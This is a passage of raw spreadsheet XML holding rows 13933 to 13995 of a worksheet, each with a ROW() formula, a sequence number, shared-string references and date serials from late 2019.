        <f t="shared" si="217"/>
        <v>13932</v>
      </c>
      <c r="B13933">
        <v>3932</v>
      </c>
      <c r="C13933" t="s">
        <v>19637</v>
      </c>
      <c r="D13933" s="1">
        <v>43746</v>
      </c>
      <c r="E13933" t="s">
        <v>20250</v>
      </c>
      <c r="F13933" t="s">
        <v>10021</v>
      </c>
      <c r="G13933" t="s">
        <v>24321</v>
      </c>
    </row>
    <row r="13934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13934">
        <f t="shared" si="217"/>
        <v>13933</v>
      </c>
      <c r="B13934">
        <v>3933</v>
      </c>
      <c r="C13934" t="s">
        <v>19637</v>
      </c>
      <c r="D13934" s="1">
        <v>43742</v>
      </c>
      <c r="E13934" t="s">
        <v>24322</v>
      </c>
      <c r="F13934" t="s">
        <v>10526</v>
      </c>
      <c r="G13934" t="s">
        <v>24323</v>
      </c>
    </row>
    <row r="13935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13935">
        <f t="shared" si="217"/>
        <v>13934</v>
      </c>
      <c r="B13935">
        <v>3934</v>
      </c>
      <c r="C13935" t="s">
        <v>19637</v>
      </c>
      <c r="D13935" s="1">
        <v>43739</v>
      </c>
      <c r="E13935" t="s">
        <v>19810</v>
      </c>
      <c r="F13935" t="s">
        <v>10526</v>
      </c>
      <c r="G13935" t="s">
        <v>24324</v>
      </c>
    </row>
    <row r="13936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13936">
        <f t="shared" si="217"/>
        <v>13935</v>
      </c>
      <c r="B13936">
        <v>3935</v>
      </c>
      <c r="C13936" t="s">
        <v>19637</v>
      </c>
      <c r="D13936" s="1">
        <v>43741</v>
      </c>
      <c r="F13936" t="s">
        <v>10526</v>
      </c>
      <c r="G13936" t="s">
        <v>24325</v>
      </c>
    </row>
    <row r="13937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13937">
        <f t="shared" si="217"/>
        <v>13936</v>
      </c>
      <c r="B13937">
        <v>3936</v>
      </c>
      <c r="C13937" t="s">
        <v>19637</v>
      </c>
      <c r="D13937" s="1">
        <v>43738</v>
      </c>
      <c r="E13937" t="s">
        <v>19640</v>
      </c>
      <c r="F13937" t="s">
        <v>9975</v>
      </c>
      <c r="G13937" t="s">
        <v>24326</v>
      </c>
    </row>
    <row r="13938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13938">
        <f t="shared" si="217"/>
        <v>13937</v>
      </c>
      <c r="B13938">
        <v>3937</v>
      </c>
      <c r="C13938" t="s">
        <v>19637</v>
      </c>
      <c r="D13938" s="1">
        <v>43746</v>
      </c>
      <c r="E13938" t="s">
        <v>21517</v>
      </c>
      <c r="F13938" t="s">
        <v>9978</v>
      </c>
      <c r="G13938" t="s">
        <v>24327</v>
      </c>
    </row>
    <row r="13939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13939">
        <f t="shared" si="217"/>
        <v>13938</v>
      </c>
      <c r="B13939">
        <v>3938</v>
      </c>
      <c r="C13939" t="s">
        <v>19637</v>
      </c>
      <c r="D13939" s="1">
        <v>43745</v>
      </c>
      <c r="E13939" t="s">
        <v>19668</v>
      </c>
      <c r="F13939" t="s">
        <v>9978</v>
      </c>
      <c r="G13939" t="s">
        <v>24328</v>
      </c>
    </row>
    <row r="13940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13940">
        <f t="shared" si="217"/>
        <v>13939</v>
      </c>
      <c r="B13940">
        <v>3939</v>
      </c>
      <c r="C13940" t="s">
        <v>19637</v>
      </c>
      <c r="D13940" s="1">
        <v>43740</v>
      </c>
      <c r="E13940" t="s">
        <v>24329</v>
      </c>
      <c r="F13940" t="s">
        <v>10021</v>
      </c>
      <c r="G13940" t="s">
        <v>24330</v>
      </c>
    </row>
    <row r="13941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13941">
        <f t="shared" si="217"/>
        <v>13940</v>
      </c>
      <c r="B13941">
        <v>3940</v>
      </c>
      <c r="C13941" t="s">
        <v>19637</v>
      </c>
      <c r="D13941" s="1">
        <v>43745</v>
      </c>
      <c r="E13941" t="s">
        <v>24331</v>
      </c>
      <c r="F13941" t="s">
        <v>10526</v>
      </c>
      <c r="G13941" t="s">
        <v>24332</v>
      </c>
    </row>
    <row r="13942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13942">
        <f t="shared" si="217"/>
        <v>13941</v>
      </c>
      <c r="B13942">
        <v>3941</v>
      </c>
      <c r="C13942" t="s">
        <v>19637</v>
      </c>
      <c r="D13942" s="1">
        <v>43757</v>
      </c>
      <c r="E13942" t="s">
        <v>21962</v>
      </c>
      <c r="F13942" t="s">
        <v>10526</v>
      </c>
      <c r="G13942" t="s">
        <v>24333</v>
      </c>
    </row>
    <row r="13943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13943">
        <f t="shared" si="217"/>
        <v>13942</v>
      </c>
      <c r="B13943">
        <v>3942</v>
      </c>
      <c r="C13943" t="s">
        <v>19637</v>
      </c>
      <c r="D13943" s="1">
        <v>43754</v>
      </c>
      <c r="E13943" t="s">
        <v>24334</v>
      </c>
      <c r="F13943" t="s">
        <v>10526</v>
      </c>
      <c r="G13943" t="s">
        <v>24335</v>
      </c>
    </row>
    <row r="13944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13944">
        <f t="shared" si="217"/>
        <v>13943</v>
      </c>
      <c r="B13944">
        <v>3943</v>
      </c>
      <c r="C13944" t="s">
        <v>19637</v>
      </c>
      <c r="D13944" s="1">
        <v>43745</v>
      </c>
      <c r="E13944" t="s">
        <v>20427</v>
      </c>
      <c r="F13944" t="s">
        <v>10526</v>
      </c>
      <c r="G13944" t="s">
        <v>24336</v>
      </c>
    </row>
    <row r="13945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13945">
        <f t="shared" si="217"/>
        <v>13944</v>
      </c>
      <c r="B13945">
        <v>3944</v>
      </c>
      <c r="C13945" t="s">
        <v>19637</v>
      </c>
      <c r="D13945" s="1">
        <v>43756</v>
      </c>
      <c r="E13945" t="s">
        <v>19638</v>
      </c>
      <c r="F13945" t="s">
        <v>10021</v>
      </c>
      <c r="G13945" t="s">
        <v>24337</v>
      </c>
    </row>
    <row r="13946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13946">
        <f t="shared" si="217"/>
        <v>13945</v>
      </c>
      <c r="B13946">
        <v>3945</v>
      </c>
      <c r="C13946" t="s">
        <v>19637</v>
      </c>
      <c r="D13946" s="1">
        <v>43739</v>
      </c>
      <c r="F13946" t="s">
        <v>10526</v>
      </c>
      <c r="G13946" t="s">
        <v>24338</v>
      </c>
    </row>
    <row r="13947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13947">
        <f t="shared" si="217"/>
        <v>13946</v>
      </c>
      <c r="B13947">
        <v>3946</v>
      </c>
      <c r="C13947" t="s">
        <v>19637</v>
      </c>
      <c r="D13947" s="1">
        <v>43746</v>
      </c>
      <c r="E13947" t="s">
        <v>24339</v>
      </c>
      <c r="F13947" t="s">
        <v>10526</v>
      </c>
      <c r="G13947" t="s">
        <v>24340</v>
      </c>
    </row>
    <row r="13948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13948">
        <f t="shared" si="217"/>
        <v>13947</v>
      </c>
      <c r="B13948">
        <v>3947</v>
      </c>
      <c r="C13948" t="s">
        <v>19637</v>
      </c>
      <c r="D13948" s="1">
        <v>43741</v>
      </c>
      <c r="E13948" t="s">
        <v>24341</v>
      </c>
      <c r="F13948" t="s">
        <v>10526</v>
      </c>
      <c r="G13948" t="s">
        <v>24342</v>
      </c>
    </row>
    <row r="13949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13949">
        <f t="shared" si="217"/>
        <v>13948</v>
      </c>
      <c r="B13949">
        <v>3948</v>
      </c>
      <c r="C13949" t="s">
        <v>19637</v>
      </c>
      <c r="D13949" s="1">
        <v>43744</v>
      </c>
      <c r="E13949" t="s">
        <v>19672</v>
      </c>
      <c r="F13949" t="s">
        <v>10021</v>
      </c>
      <c r="G13949" t="s">
        <v>24343</v>
      </c>
    </row>
    <row r="13950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13950">
        <f t="shared" si="217"/>
        <v>13949</v>
      </c>
      <c r="B13950">
        <v>3949</v>
      </c>
      <c r="C13950" t="s">
        <v>19637</v>
      </c>
      <c r="D13950" s="1">
        <v>43748</v>
      </c>
      <c r="F13950" t="s">
        <v>10526</v>
      </c>
      <c r="G13950" t="s">
        <v>24344</v>
      </c>
    </row>
    <row r="13951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13951">
        <f t="shared" si="217"/>
        <v>13950</v>
      </c>
      <c r="B13951">
        <v>3950</v>
      </c>
      <c r="C13951" t="s">
        <v>19637</v>
      </c>
      <c r="D13951" s="1">
        <v>43755</v>
      </c>
      <c r="E13951" t="s">
        <v>19680</v>
      </c>
      <c r="F13951" t="s">
        <v>10021</v>
      </c>
      <c r="G13951" t="s">
        <v>24345</v>
      </c>
    </row>
    <row r="13952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13952">
        <f t="shared" si="217"/>
        <v>13951</v>
      </c>
      <c r="B13952">
        <v>3951</v>
      </c>
      <c r="C13952" t="s">
        <v>19637</v>
      </c>
      <c r="D13952" s="1">
        <v>43751</v>
      </c>
      <c r="E13952" t="s">
        <v>19680</v>
      </c>
      <c r="F13952" t="s">
        <v>10021</v>
      </c>
      <c r="G13952" t="s">
        <v>24346</v>
      </c>
    </row>
    <row r="13953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13953">
        <f t="shared" si="217"/>
        <v>13952</v>
      </c>
      <c r="B13953">
        <v>3952</v>
      </c>
      <c r="C13953" t="s">
        <v>19637</v>
      </c>
      <c r="D13953" s="1">
        <v>43742</v>
      </c>
      <c r="E13953" t="s">
        <v>19896</v>
      </c>
      <c r="F13953" t="s">
        <v>10021</v>
      </c>
      <c r="G13953" t="s">
        <v>24347</v>
      </c>
    </row>
    <row r="13954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13954">
        <f t="shared" si="217"/>
        <v>13953</v>
      </c>
      <c r="B13954">
        <v>3953</v>
      </c>
      <c r="C13954" t="s">
        <v>19637</v>
      </c>
      <c r="D13954" s="1">
        <v>43757</v>
      </c>
      <c r="E13954" t="s">
        <v>19650</v>
      </c>
      <c r="F13954" t="s">
        <v>10021</v>
      </c>
      <c r="G13954" t="s">
        <v>24348</v>
      </c>
    </row>
    <row r="13955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13955">
        <f t="shared" ref="A13955:A14018" si="218">+ROW(A13954)</f>
        <v>13954</v>
      </c>
      <c r="B13955">
        <v>3954</v>
      </c>
      <c r="C13955" t="s">
        <v>19637</v>
      </c>
      <c r="D13955" s="1">
        <v>43750</v>
      </c>
      <c r="F13955" t="s">
        <v>10526</v>
      </c>
      <c r="G13955" t="s">
        <v>24349</v>
      </c>
    </row>
    <row r="13956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13956">
        <f t="shared" si="218"/>
        <v>13955</v>
      </c>
      <c r="B13956">
        <v>3955</v>
      </c>
      <c r="C13956" t="s">
        <v>19637</v>
      </c>
      <c r="D13956" s="1">
        <v>43747</v>
      </c>
      <c r="E13956" t="s">
        <v>24350</v>
      </c>
      <c r="F13956" t="s">
        <v>10526</v>
      </c>
      <c r="G13956" t="s">
        <v>24351</v>
      </c>
    </row>
    <row r="13957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13957">
        <f t="shared" si="218"/>
        <v>13956</v>
      </c>
      <c r="B13957">
        <v>3956</v>
      </c>
      <c r="C13957" t="s">
        <v>19637</v>
      </c>
      <c r="D13957" s="1">
        <v>43752</v>
      </c>
      <c r="E13957" t="s">
        <v>19680</v>
      </c>
      <c r="F13957" t="s">
        <v>10021</v>
      </c>
      <c r="G13957" t="s">
        <v>24352</v>
      </c>
    </row>
    <row r="13958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13958">
        <f t="shared" si="218"/>
        <v>13957</v>
      </c>
      <c r="B13958">
        <v>3957</v>
      </c>
      <c r="C13958" t="s">
        <v>19637</v>
      </c>
      <c r="D13958" s="1">
        <v>43753</v>
      </c>
      <c r="F13958" t="s">
        <v>10021</v>
      </c>
      <c r="G13958" t="s">
        <v>24353</v>
      </c>
    </row>
    <row r="13959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13959">
        <f t="shared" si="218"/>
        <v>13958</v>
      </c>
      <c r="B13959">
        <v>3958</v>
      </c>
      <c r="C13959" t="s">
        <v>19637</v>
      </c>
      <c r="D13959" s="1">
        <v>43748</v>
      </c>
      <c r="E13959" t="s">
        <v>19640</v>
      </c>
      <c r="F13959" t="s">
        <v>10021</v>
      </c>
      <c r="G13959" t="s">
        <v>24354</v>
      </c>
    </row>
    <row r="13960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13960">
        <f t="shared" si="218"/>
        <v>13959</v>
      </c>
      <c r="B13960">
        <v>3959</v>
      </c>
      <c r="C13960" t="s">
        <v>19637</v>
      </c>
      <c r="D13960" s="1">
        <v>43747</v>
      </c>
      <c r="E13960" t="s">
        <v>21491</v>
      </c>
      <c r="F13960" t="s">
        <v>10526</v>
      </c>
      <c r="G13960" t="s">
        <v>24355</v>
      </c>
    </row>
    <row r="13961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13961">
        <f t="shared" si="218"/>
        <v>13960</v>
      </c>
      <c r="B13961">
        <v>3960</v>
      </c>
      <c r="C13961" t="s">
        <v>19637</v>
      </c>
      <c r="D13961" s="1">
        <v>43756</v>
      </c>
      <c r="E13961" t="s">
        <v>19640</v>
      </c>
      <c r="F13961" t="s">
        <v>10021</v>
      </c>
      <c r="G13961" t="s">
        <v>24356</v>
      </c>
    </row>
    <row r="13962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13962">
        <f t="shared" si="218"/>
        <v>13961</v>
      </c>
      <c r="B13962">
        <v>3961</v>
      </c>
      <c r="C13962" t="s">
        <v>19637</v>
      </c>
      <c r="D13962" s="1">
        <v>43745</v>
      </c>
      <c r="E13962" t="s">
        <v>19663</v>
      </c>
      <c r="F13962" t="s">
        <v>9975</v>
      </c>
      <c r="G13962" t="s">
        <v>24357</v>
      </c>
    </row>
    <row r="13963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13963">
        <f t="shared" si="218"/>
        <v>13962</v>
      </c>
      <c r="B13963">
        <v>3962</v>
      </c>
      <c r="C13963" t="s">
        <v>19637</v>
      </c>
      <c r="D13963" s="1">
        <v>43745</v>
      </c>
      <c r="E13963" t="s">
        <v>20944</v>
      </c>
      <c r="F13963" t="s">
        <v>9975</v>
      </c>
      <c r="G13963" t="s">
        <v>24358</v>
      </c>
    </row>
    <row r="13964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13964">
        <f t="shared" si="218"/>
        <v>13963</v>
      </c>
      <c r="B13964">
        <v>3963</v>
      </c>
      <c r="C13964" t="s">
        <v>19637</v>
      </c>
      <c r="D13964" s="1">
        <v>43744</v>
      </c>
      <c r="E13964" t="s">
        <v>24359</v>
      </c>
      <c r="F13964" t="s">
        <v>10021</v>
      </c>
      <c r="G13964" t="s">
        <v>24360</v>
      </c>
    </row>
    <row r="13965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13965">
        <f t="shared" si="218"/>
        <v>13964</v>
      </c>
      <c r="B13965">
        <v>3964</v>
      </c>
      <c r="C13965" t="s">
        <v>19637</v>
      </c>
      <c r="D13965" s="1">
        <v>43755</v>
      </c>
      <c r="E13965" t="s">
        <v>21822</v>
      </c>
      <c r="F13965" t="s">
        <v>9978</v>
      </c>
      <c r="G13965" t="s">
        <v>24361</v>
      </c>
    </row>
    <row r="13966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13966">
        <f t="shared" si="218"/>
        <v>13965</v>
      </c>
      <c r="B13966">
        <v>3965</v>
      </c>
      <c r="C13966" t="s">
        <v>19637</v>
      </c>
      <c r="D13966" s="1">
        <v>43739</v>
      </c>
      <c r="F13966" t="s">
        <v>10526</v>
      </c>
      <c r="G13966" t="s">
        <v>24362</v>
      </c>
    </row>
    <row r="13967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13967">
        <f t="shared" si="218"/>
        <v>13966</v>
      </c>
      <c r="B13967">
        <v>3966</v>
      </c>
      <c r="C13967" t="s">
        <v>19637</v>
      </c>
      <c r="D13967" s="1">
        <v>43755</v>
      </c>
      <c r="E13967" t="s">
        <v>20563</v>
      </c>
      <c r="F13967" t="s">
        <v>10021</v>
      </c>
      <c r="G13967" t="s">
        <v>24363</v>
      </c>
    </row>
    <row r="13968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13968">
        <f t="shared" si="218"/>
        <v>13967</v>
      </c>
      <c r="B13968">
        <v>3967</v>
      </c>
      <c r="C13968" t="s">
        <v>19637</v>
      </c>
      <c r="D13968" s="1">
        <v>43751</v>
      </c>
      <c r="E13968" t="s">
        <v>20834</v>
      </c>
      <c r="F13968" t="s">
        <v>9978</v>
      </c>
      <c r="G13968" t="s">
        <v>24364</v>
      </c>
    </row>
    <row r="13969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13969">
        <f t="shared" si="218"/>
        <v>13968</v>
      </c>
      <c r="B13969">
        <v>3968</v>
      </c>
      <c r="C13969" t="s">
        <v>19637</v>
      </c>
      <c r="D13969" s="1">
        <v>43751</v>
      </c>
      <c r="F13969" t="s">
        <v>10526</v>
      </c>
      <c r="G13969" t="s">
        <v>24365</v>
      </c>
    </row>
    <row r="13970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13970">
        <f t="shared" si="218"/>
        <v>13969</v>
      </c>
      <c r="B13970">
        <v>3969</v>
      </c>
      <c r="C13970" t="s">
        <v>19637</v>
      </c>
      <c r="D13970" s="1">
        <v>43746</v>
      </c>
      <c r="E13970" t="s">
        <v>19640</v>
      </c>
      <c r="F13970" t="s">
        <v>10021</v>
      </c>
      <c r="G13970" t="s">
        <v>24366</v>
      </c>
    </row>
    <row r="13971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13971">
        <f t="shared" si="218"/>
        <v>13970</v>
      </c>
      <c r="B13971">
        <v>3970</v>
      </c>
      <c r="C13971" t="s">
        <v>19637</v>
      </c>
      <c r="D13971" s="1">
        <v>43748</v>
      </c>
      <c r="E13971" t="s">
        <v>24367</v>
      </c>
      <c r="F13971" t="s">
        <v>10526</v>
      </c>
      <c r="G13971" t="s">
        <v>24368</v>
      </c>
    </row>
    <row r="13972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13972">
        <f t="shared" si="218"/>
        <v>13971</v>
      </c>
      <c r="B13972">
        <v>3971</v>
      </c>
      <c r="C13972" t="s">
        <v>19637</v>
      </c>
      <c r="D13972" s="1">
        <v>43742</v>
      </c>
      <c r="F13972" t="s">
        <v>10021</v>
      </c>
      <c r="G13972" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13973">
        <f t="shared" si="218"/>
        <v>13972</v>
      </c>
      <c r="B13973">
        <v>3972</v>
      </c>
      <c r="C13973" t="s">
        <v>19637</v>
      </c>
      <c r="D13973" s="1">
        <v>43747</v>
      </c>
      <c r="E13973" t="s">
        <v>21235</v>
      </c>
      <c r="F13973" t="s">
        <v>10021</v>
      </c>
      <c r="G13973" t="s">
        <v>24369</v>
      </c>
    </row>
    <row r="13974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13974">
        <f t="shared" si="218"/>
        <v>13973</v>
      </c>
      <c r="B13974">
        <v>3973</v>
      </c>
      <c r="C13974" t="s">
        <v>19637</v>
      </c>
      <c r="D13974" s="1">
        <v>43744</v>
      </c>
      <c r="E13974" t="s">
        <v>24370</v>
      </c>
      <c r="F13974" t="s">
        <v>9978</v>
      </c>
      <c r="G13974" t="s">
        <v>24371</v>
      </c>
    </row>
    <row r="13975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13975">
        <f t="shared" si="218"/>
        <v>13974</v>
      </c>
      <c r="B13975">
        <v>3974</v>
      </c>
      <c r="C13975" t="s">
        <v>19637</v>
      </c>
      <c r="D13975" s="1">
        <v>43743</v>
      </c>
      <c r="E13975" t="s">
        <v>20478</v>
      </c>
      <c r="F13975" t="s">
        <v>10526</v>
      </c>
      <c r="G13975" t="s">
        <v>24372</v>
      </c>
    </row>
    <row r="13976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13976">
        <f t="shared" si="218"/>
        <v>13975</v>
      </c>
      <c r="B13976">
        <v>3975</v>
      </c>
      <c r="C13976" t="s">
        <v>19637</v>
      </c>
      <c r="D13976" s="1">
        <v>43739</v>
      </c>
      <c r="F13976" t="s">
        <v>10526</v>
      </c>
      <c r="G13976" t="s">
        <v>24373</v>
      </c>
    </row>
    <row r="13977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13977">
        <f t="shared" si="218"/>
        <v>13976</v>
      </c>
      <c r="B13977">
        <v>3976</v>
      </c>
      <c r="C13977" t="s">
        <v>19637</v>
      </c>
      <c r="D13977" s="1">
        <v>43748</v>
      </c>
      <c r="E13977" t="s">
        <v>20024</v>
      </c>
      <c r="F13977" t="s">
        <v>10526</v>
      </c>
      <c r="G13977" t="s">
        <v>24374</v>
      </c>
    </row>
    <row r="13978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13978">
        <f t="shared" si="218"/>
        <v>13977</v>
      </c>
      <c r="B13978">
        <v>3977</v>
      </c>
      <c r="C13978" t="s">
        <v>19637</v>
      </c>
      <c r="D13978" s="1">
        <v>43747</v>
      </c>
      <c r="E13978" t="s">
        <v>19917</v>
      </c>
      <c r="F13978" t="s">
        <v>9975</v>
      </c>
      <c r="G13978" t="s">
        <v>24375</v>
      </c>
    </row>
    <row r="13979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13979">
        <f t="shared" si="218"/>
        <v>13978</v>
      </c>
      <c r="B13979">
        <v>3978</v>
      </c>
      <c r="C13979" t="s">
        <v>19637</v>
      </c>
      <c r="D13979" s="1">
        <v>43748</v>
      </c>
      <c r="E13979" t="s">
        <v>19643</v>
      </c>
      <c r="F13979" t="s">
        <v>10021</v>
      </c>
      <c r="G13979" t="s">
        <v>24376</v>
      </c>
    </row>
    <row r="13980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13980">
        <f t="shared" si="218"/>
        <v>13979</v>
      </c>
      <c r="B13980">
        <v>3979</v>
      </c>
      <c r="C13980" t="s">
        <v>19637</v>
      </c>
      <c r="D13980" s="1">
        <v>43739</v>
      </c>
      <c r="E13980" t="s">
        <v>21130</v>
      </c>
      <c r="F13980" t="s">
        <v>10526</v>
      </c>
      <c r="G13980" t="s">
        <v>24377</v>
      </c>
    </row>
    <row r="13981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13981">
        <f t="shared" si="218"/>
        <v>13980</v>
      </c>
      <c r="B13981">
        <v>3980</v>
      </c>
      <c r="C13981" t="s">
        <v>19637</v>
      </c>
      <c r="D13981" s="1">
        <v>43742</v>
      </c>
      <c r="E13981" t="s">
        <v>20347</v>
      </c>
      <c r="F13981" t="s">
        <v>9975</v>
      </c>
      <c r="G13981" t="s">
        <v>24378</v>
      </c>
    </row>
    <row r="13982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13982">
        <f t="shared" si="218"/>
        <v>13981</v>
      </c>
      <c r="B13982">
        <v>3981</v>
      </c>
      <c r="C13982" t="s">
        <v>19637</v>
      </c>
      <c r="D13982" s="1">
        <v>43748</v>
      </c>
      <c r="E13982" t="s">
        <v>24379</v>
      </c>
      <c r="F13982" t="s">
        <v>10526</v>
      </c>
      <c r="G13982" t="s">
        <v>24380</v>
      </c>
    </row>
    <row r="13983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13983">
        <f t="shared" si="218"/>
        <v>13982</v>
      </c>
      <c r="B13983">
        <v>3982</v>
      </c>
      <c r="C13983" t="s">
        <v>19637</v>
      </c>
      <c r="D13983" s="1">
        <v>43754</v>
      </c>
      <c r="E13983" t="s">
        <v>20032</v>
      </c>
      <c r="F13983" t="s">
        <v>10021</v>
      </c>
      <c r="G13983" t="s">
        <v>24381</v>
      </c>
    </row>
    <row r="13984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13984">
        <f t="shared" si="218"/>
        <v>13983</v>
      </c>
      <c r="B13984">
        <v>3983</v>
      </c>
      <c r="C13984" t="s">
        <v>19637</v>
      </c>
      <c r="D13984" s="1">
        <v>43739</v>
      </c>
      <c r="E13984" t="s">
        <v>19640</v>
      </c>
      <c r="F13984" t="s">
        <v>10021</v>
      </c>
      <c r="G13984" t="s">
        <v>24382</v>
      </c>
    </row>
    <row r="13985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13985">
        <f t="shared" si="218"/>
        <v>13984</v>
      </c>
      <c r="B13985">
        <v>3984</v>
      </c>
      <c r="C13985" t="s">
        <v>19637</v>
      </c>
      <c r="D13985" s="1">
        <v>43742</v>
      </c>
      <c r="F13985" t="s">
        <v>10526</v>
      </c>
      <c r="G13985" t="s">
        <v>24383</v>
      </c>
    </row>
    <row r="13986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13986">
        <f t="shared" si="218"/>
        <v>13985</v>
      </c>
      <c r="B13986">
        <v>3985</v>
      </c>
      <c r="C13986" t="s">
        <v>19637</v>
      </c>
      <c r="D13986" s="1">
        <v>43744</v>
      </c>
      <c r="E13986" t="s">
        <v>19785</v>
      </c>
      <c r="F13986" t="s">
        <v>9975</v>
      </c>
      <c r="G13986" t="s">
        <v>24384</v>
      </c>
    </row>
    <row r="13987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13987">
        <f t="shared" si="218"/>
        <v>13986</v>
      </c>
      <c r="B13987">
        <v>3986</v>
      </c>
      <c r="C13987" t="s">
        <v>19637</v>
      </c>
      <c r="D13987" s="1">
        <v>43742</v>
      </c>
      <c r="E13987" t="s">
        <v>19750</v>
      </c>
      <c r="F13987" t="s">
        <v>9978</v>
      </c>
      <c r="G13987" t="s">
        <v>24385</v>
      </c>
    </row>
    <row r="13988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13988">
        <f t="shared" si="218"/>
        <v>13987</v>
      </c>
      <c r="B13988">
        <v>3987</v>
      </c>
      <c r="C13988" t="s">
        <v>19637</v>
      </c>
      <c r="D13988" s="1">
        <v>43753</v>
      </c>
      <c r="E13988" t="s">
        <v>24386</v>
      </c>
      <c r="F13988" t="s">
        <v>10526</v>
      </c>
      <c r="G13988" t="s">
        <v>24387</v>
      </c>
    </row>
    <row r="13989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13989">
        <f t="shared" si="218"/>
        <v>13988</v>
      </c>
      <c r="B13989">
        <v>3988</v>
      </c>
      <c r="C13989" t="s">
        <v>19637</v>
      </c>
      <c r="D13989" s="1">
        <v>43749</v>
      </c>
      <c r="E13989" t="s">
        <v>19781</v>
      </c>
      <c r="F13989" t="s">
        <v>10526</v>
      </c>
      <c r="G13989" t="s">
        <v>24388</v>
      </c>
    </row>
    <row r="13990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13990">
        <f t="shared" si="218"/>
        <v>13989</v>
      </c>
      <c r="B13990">
        <v>3989</v>
      </c>
      <c r="C13990" t="s">
        <v>19637</v>
      </c>
      <c r="D13990" s="1">
        <v>43745</v>
      </c>
      <c r="E13990" t="s">
        <v>20577</v>
      </c>
      <c r="F13990" t="s">
        <v>10021</v>
      </c>
      <c r="G13990" t="s">
        <v>24389</v>
      </c>
    </row>
    <row r="13991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13991">
        <f t="shared" si="218"/>
        <v>13990</v>
      </c>
      <c r="B13991">
        <v>3990</v>
      </c>
      <c r="C13991" t="s">
        <v>19637</v>
      </c>
      <c r="D13991" s="1">
        <v>43746</v>
      </c>
      <c r="F13991" t="s">
        <v>10021</v>
      </c>
      <c r="G13991" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13992">
        <f t="shared" si="218"/>
        <v>13991</v>
      </c>
      <c r="B13992">
        <v>3991</v>
      </c>
      <c r="C13992" t="s">
        <v>19637</v>
      </c>
      <c r="D13992" s="1">
        <v>43745</v>
      </c>
      <c r="F13992" t="s">
        <v>10526</v>
      </c>
      <c r="G13992" t="s">
        <v>24390</v>
      </c>
    </row>
    <row r="13993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13993">
        <f t="shared" si="218"/>
        <v>13992</v>
      </c>
      <c r="B13993">
        <v>3992</v>
      </c>
      <c r="C13993" t="s">
        <v>19637</v>
      </c>
      <c r="D13993" s="1">
        <v>43750</v>
      </c>
      <c r="E13993" t="s">
        <v>19672</v>
      </c>
      <c r="F13993" t="s">
        <v>10021</v>
      </c>
      <c r="G13993" t="s">
        <v>24391</v>
      </c>
    </row>
    <row r="13994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13994">
        <f t="shared" si="218"/>
        <v>13993</v>
      </c>
      <c r="B13994">
        <v>3993</v>
      </c>
      <c r="C13994" t="s">
        <v>19637</v>
      </c>
      <c r="D13994" s="1">
        <v>43757</v>
      </c>
      <c r="E13994" t="s">
        <v>23692</v>
      </c>
      <c r="F13994" t="s">
        <v>10021</v>
      </c>
      <c r="G13994" t="s">
        <v>24392</v>
      </c>
    </row>
    <row r="13995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13995">
        <f t="shared" si="218"/>
        <v>13994</v>
      </c>
      <c r="B13995">
        <v>3994</v>
      </c>
      <c r="C13995" t="s">
